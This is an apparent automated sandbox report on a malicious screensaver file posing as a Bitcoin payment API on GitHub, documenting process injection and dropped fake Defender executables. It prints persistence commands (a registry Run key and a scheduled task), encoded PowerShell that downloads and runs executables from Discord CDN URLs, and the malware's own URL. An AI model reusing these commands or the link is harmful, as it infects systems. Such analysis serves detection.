hxxps://github[.]com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls[.][.]scr

Analysis

max time kernel
148s
max time network
133s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
17-10-2022 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls..scr

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

pid	Process
1476	BitecoinPaymentApi‮nls.scr
1652	WINDOWSHELLHOSTT.EXE
1560	DEFENDERRUNTIME.EXE
1184	DEFENDERRUNTIMEE.EXE
468	FILEMANAGE.EXE
1500	FILEMANAGER.EXE
2040	REDLINESECURITY.EXE
1152	REDLINESECURTY.EXE
1688	S500UBNAN.EXE
760	SECURITYHEALTHSERVICE.EXE
1596	SECURITYHEALTHSEURVIC.EXE
1484	SECURITYHOST.EXE
1200	WINDOWSDEFENDERSMART.EXE
1876	WINDOWSPROTECT.EXE

Loads dropped DLL 13 IoCs

pid	Process
1196	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe
820	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIndowShellHost = "C:\\Users\\Admin\\AppData\\Roaming\\WIndowShellHost\\WIndowShellHost.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1476 set thread context of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1652 set thread context of 820	1652	WINDOWSHELLHOSTT.EXE	38

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1200	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = b0ead4ff4be2d801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 306da5134ce2d801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c00000000020000000000106600000001000020000000b0536a083a78b082a8cea012534bd03a994728fe3f828a9de84b22f44602f32c000000000e80000000020000200000003372115c5911ffc28a8f287bd1f25d1cede28bb3353f1506c4ef983c55f5114490000000a123b48805d423729f76b2a99cb6d3fd07a74c265a5dfe3b7ef88f4e1a1ad4c7cd3bfabb36056840ce2d00e6da41227fddeb16c9579005e566444a0b240940ff26e781472ded1df33daef4eb48e9c160b194f16f6df9bab7fd437606b31e1088431806702d028f5403f79b882c54abbb2fb2bf320fcf0b4af06a43361458d4436327c5312bd2b497e20517a6d6cfb1174000000091ba9a2c85aaf3fd6a1c09c7cef201fd1564f17b2bd3a6de80ccafb734bd5b099bf936e8ba5ed1790f50c57c023659e3cd9f0e06560005bcf0312105c4aeaebc	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{33681A01-4E3F-11ED-9C90-C6457FCBF3CF} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372791893"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d3b98f5693c0d24b85f349229339c59c00000000020000000000106600000001000020000000c933bedc4fa5385618f0920f7538bc701b5f250c7ca4aa6e14d504e6f27a5426000000000e8000000002000020000000322751da8cfe5546f27cf251d067fac12f1efd9917ee03951393968de91bc22020000000aa80d8d2f6acd504890722724074b08569e1aeec21c689331229ed43f6d4cc5d40000000be75b5e3673eef7831867ee4b35d76136ee2d2b55be6e7a85bac791dc87da31948c07f53dd6d93327c637d048d9e0af5988effec5c058bf5bd78ec9277594281	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1652	WINDOWSHELLHOSTT.EXE
1652	WINDOWSHELLHOSTT.EXE
1012	powershell.exe
2404	powershell.exe
2348	powershell.exe
2432	powershell.exe
2312	powershell.exe
2376	powershell.exe
2360	powershell.exe
2444	powershell.exe
2340	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1652	WINDOWSHELLHOSTT.EXE
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2312	powershell.exe
Token: SeDebugPrivilege	2376	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2444	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
784	iexplore.exe
784	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
784	iexplore.exe
784	iexplore.exe
1592	IEXPLORE.EXE
1592	IEXPLORE.EXE
1592	IEXPLORE.EXE
1592	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 784 wrote to memory of 1592	784	iexplore.exe	27
PID 784 wrote to memory of 1592	784	iexplore.exe	27
PID 784 wrote to memory of 1592	784	iexplore.exe	27
PID 784 wrote to memory of 1592	784	iexplore.exe	27
PID 784 wrote to memory of 1476	784	iexplore.exe	29
PID 784 wrote to memory of 1476	784	iexplore.exe	29
PID 784 wrote to memory of 1476	784	iexplore.exe	29
PID 784 wrote to memory of 1476	784	iexplore.exe	29
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1476 wrote to memory of 1196	1476	BitecoinPaymentApi‮nls.scr	30
PID 1196 wrote to memory of 1652	1196	RegAsm.exe	31
PID 1196 wrote to memory of 1652	1196	RegAsm.exe	31
PID 1196 wrote to memory of 1652	1196	RegAsm.exe	31
PID 1196 wrote to memory of 1652	1196	RegAsm.exe	31
PID 1652 wrote to memory of 1012	1652	WINDOWSHELLHOSTT.EXE	32
PID 1652 wrote to memory of 1012	1652	WINDOWSHELLHOSTT.EXE	32
PID 1652 wrote to memory of 1012	1652	WINDOWSHELLHOSTT.EXE	32
PID 1652 wrote to memory of 1012	1652	WINDOWSHELLHOSTT.EXE	32
PID 1652 wrote to memory of 1824	1652	WINDOWSHELLHOSTT.EXE	34
PID 1652 wrote to memory of 1824	1652	WINDOWSHELLHOSTT.EXE	34
PID 1652 wrote to memory of 1824	1652	WINDOWSHELLHOSTT.EXE	34
PID 1652 wrote to memory of 1824	1652	WINDOWSHELLHOSTT.EXE	34
PID 1824 wrote to memory of 1200	1824	cmd.exe	36
PID 1824 wrote to memory of 1200	1824	cmd.exe	36
PID 1824 wrote to memory of 1200	1824	cmd.exe	36
PID 1824 wrote to memory of 1200	1824	cmd.exe	36
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 1152	1652	WINDOWSHELLHOSTT.EXE	37
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 1652 wrote to memory of 820	1652	WINDOWSHELLHOSTT.EXE	38
PID 820 wrote to memory of 1560	820	RegAsm.exe	39
PID 820 wrote to memory of 1560	820	RegAsm.exe	39
PID 820 wrote to memory of 1560	820	RegAsm.exe	39
PID 820 wrote to memory of 1560	820	RegAsm.exe	39
PID 820 wrote to memory of 1184	820	RegAsm.exe	40

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/RcsMonster/Bitecoin-Payment-Get-Api/blob/main/Bitecoin%20Api%20Payment%20Pay/GoUrl/BitecoinPaymentApi%E2%80%AEnls..scr
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:784
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:784 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:1592
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WRZXZATJ\BitecoinPaymentApi‮nls.scr
  "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WRZXZATJ\BitecoinPaymentApi‮nls.scr" /S
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    #cmd
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Users\Admin\AppData\Roaming\WINDOWSHELLHOSTT.EXE
      "C:\Users\Admin\AppData\Roaming\WINDOWSHELLHOSTT.EXE"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1652
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WIndowShellHost' -Value '"C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe"' -PropertyType 'String'
        5⤵
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1012
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C schtasks /create /tn \WIndowShellHost /tr "C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1824
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \WIndowShellHost /tr "C:\Users\Admin\AppData\Roaming\WIndowShellHost\WIndowShellHost.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        6⤵
        Creates scheduled task(s)
        
        PID:1200
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        5⤵
        
        PID:1152
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        #cmd
        5⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:820
      - C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE
        
        "C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIME.EXE"
        6⤵
        Executes dropped EXE
        
        PID:1560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAdQBuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA4ADkAOAA4ADcAMgA2ADgAOAA2ADgAMAAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwAsACAAPAAjAGUAcgBlACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwB4AGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARABlAGYAZQBuAGQAZQByAFIAdQBuAHQAaQBtAGUALgBlAHgAZQAnACkAKQA8ACMAbQBqAGsAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB0AGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAagBjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAC4AZQB4AGUAJwApADwAIwB0AGcAeAAjAD4A"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348
      - C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE
        
        "C:\Users\Admin\AppData\Roaming\DEFENDERRUNTIMEE.EXE"
        6⤵
        Executes dropped EXE
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAeQB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANQA3ADkAMwA3ADkAMgA4ADAAMgA5ADMANgAvAEQAZQBmAGUAbgBkAGUAcgBSAHUAbgB0AGkAbQBlAGUALgBlAHgAZQAnACwAIAA8ACMAaABhAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAGIAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAHAAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApACkAPAAjAGcAcwB0ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcAB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBzAHYAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBEAGUAZgBlAG4AZABlAHIAUgB1AG4AdABpAG0AZQBlAC4AZQB4AGUAJwApADwAIwBwAG4AeAAjAD4A"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
      - C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE
        
        "C:\Users\Admin\AppData\Roaming\FILEMANAGE.EXE"
        6⤵
        Executes dropped EXE
        
        PID:468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAagB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADcAMQA5ADUAMgA5ADIAOAA4ADMAMwA3ADAAMAAzADQALwAxADAAMwAwADgAOAA3ADEAOAA5ADYAMAAyADYANQAyADIAMgAxAC8ARgBpAGwAZQBNAGEAbgBhAGcAZQAuAGUAeABlACcALAAgADwAIwBpAG4AcAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAYwBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcABnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAKQA8ACMAdwB6AG0AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBkAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAeQBkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUALgBlAHgAZQAnACkAPAAjAGsAdwBqACMAPgA="
        7⤵
        
        PID:2296
      - C:\Users\Admin\AppData\Roaming\FILEMANAGER.EXE
        
        "C:\Users\Admin\AppData\Roaming\FILEMANAGER.EXE"
        6⤵
        Executes dropped EXE
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgBzACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgA3ADEAOQA1ADIAOQAyADgAOAAzADMANwAwADAAMwA0AC8AMQAwADMAMAA4ADgANgA4ADkANQAyADAAMAAyADUAMQA5ADkANgAvAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcALAAgADwAIwB0AG0AdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AcgBnACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAagBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEYAaQBsAGUATQBhAG4AYQBnAGUAcgAuAGUAeABlACcAKQApADwAIwBmAHIAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAHIAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZQBzAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQBNAGEAbgBhAGcAZQByAC4AZQB4AGUAJwApADwAIwBnAHYAbAAjAD4A"
        7⤵
        
        PID:2484
      - C:\Users\Admin\AppData\Roaming\REDLINESECURITY.EXE
        
        "C:\Users\Admin\AppData\Roaming\REDLINESECURITY.EXE"
        6⤵
        Executes dropped EXE
        
        PID:2040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
